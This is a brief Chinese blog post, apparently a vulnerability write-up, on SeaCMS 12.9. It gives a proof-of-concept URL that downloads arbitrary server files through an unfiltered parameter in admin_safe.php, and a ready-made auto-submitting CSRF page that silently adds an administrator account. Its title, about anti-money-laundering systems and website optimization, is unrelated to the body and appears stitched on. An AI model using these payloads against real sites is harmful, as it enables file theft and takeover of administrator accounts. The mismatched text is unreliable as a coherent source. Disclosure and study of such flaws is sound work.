系统开发应注重对反洗钱系统进行运行维护和统一管理太原网站优化
文章目录
- admin/admin_safe.php任意文件下载
- CSRF 添加管理员账户
- CSRF配合XSS弹cookie
admin/admin_safe.php任意文件下载
在admin_safe.php文件下有着这么一段代码,他的作用时检查action的值是否为download,如果为download那么将你传入的文件直接打印给你。这里并未对用户传入的file变量做任何过滤。
poc:http://www.seacms/ozcf6u/admin_safe.php?action=scan&file=E:/phpStudy_64/phpstudy_pro/WWW/SeaCMS_12.9/Upload/ozcf6u/admin_safe.php,即可下载任意目录下的文件。
CSRF 添加管理员账户
poc:
<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><form action="http://www.seacms/ozcf6u/admin_manager.php?action=add" method="POST"><input type="hidden" name="username" value="test" /><input type="hidden" name="pwd" value="test" /><input type="hidden" name="pwd2" value="test" /><input type="hidden" name="groupid" value="1" /><input type="submit" value="Submit request" /></form><script>history.pushState('', '', '/');document.forms[0].submit();</script></body>
</html>成功效果图:
CSRF配合XSS弹cookie
很多漏洞网上很多师傅都大多复现过,大同小异,这里就不赘述了。